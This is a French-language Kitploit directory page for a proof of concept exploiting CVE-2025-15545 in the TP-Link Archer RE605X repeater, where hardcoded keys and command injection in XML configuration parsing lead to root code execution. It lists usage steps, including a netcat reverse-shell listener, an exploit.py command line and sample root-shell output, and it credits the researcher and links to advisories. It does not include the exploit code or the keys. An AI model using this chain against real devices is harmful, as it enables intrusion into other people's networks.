Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-15545 — Preuve de concept pour CVE-2025-15545 | Kitploit
Outils/GitHubGitHub/xernary/cve-2025-15545
Sécurité des Systèmes EmbarquésSécurité IoTAnalyse des VulnérabilitésExploitationRétro-ingénierieCommandement et Contrôle
GitHubxernary/cve-2025-15545

CVE-2025-15545

Preuve de concept pour CVE-2025-15545

Voir le dépôt
12il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

CVE-2025-15545

Informations

Vendeur : TP-Link
Site web du vendeur : TP-Link
Modèle : Archer RE605X
Version matérielle : RE605X v3.0
Version du firmware : RE605X(EU)_V3_1.1.5 Build 20240905
Adresse de téléchargement du firmware : TP-Link

Une chaîne de vulnérabilités — incluant l'utilisation de clés cryptographiques codées en dur et une injection de commandes dans le composant d'analyse de la configuration XML — permet à un attaquant authentifié localement d'exécuter du code à distance (RCE) en tant que root sur l'appareil.

Prérequis du PoC

Note : Le proof-of-concept exploit.py démontre un scénario d'attaque enchaîné et repose sur des identifiants d'un utilisateur authentifié comme prérequis supplémentaire. Cette étape d'authentification n'est pas couverte par CVE-2025-15545 et est incluse uniquement à des fins de démonstration.

  • L'attaquant et la victime doivent être connectés au réseau local du répéteur.
  • La victime doit être authentifiée auprès du panneau de contrôle web du répéteur.

Utilisation

Écoutez les connexions entrantes dans un terminal séparé :

root@kitploit:~
$ nc -lvnp 4444

Exécutez le script exploit.py :

root@kitploit:~
$ sudo python3 exploit.py <interface> <victim_ip> <repeater_ip> <aes_key> <aes_iv>

Note : aes_key et aes_iv sont les clés cryptographiques codées en dur utilisées pour le chiffrement et le déchiffrement des fichiers de configuration par l'appareil, et sont nécessaires pour cette preuve de concept. Pour des raisons de sécurité, elles ne peuvent pas être partagées ici.

Le shell inversé est reçu dans le premier terminal :

root@kitploit:~
$ nc -lvnp 4444

Connection from 192.168.0.254:42762
# ls
cgi-bin
index-notice.html
index-url.html
index.html
webpages
# id -un
root
# uname -n
OpenWrt

Références

Ces vulnérabilités ont été signalées par Nicola Giuffrida.

  • Article complet : https://nico-security.com/posts/cve-2025-15545
  • Enregistrement CVE : https://www.cve.org/cverecord?id=CVE-2025-15545
  • Avis TP-Link : https://www.tp-link.com/us/support/faq/4929
Télécharger l’outil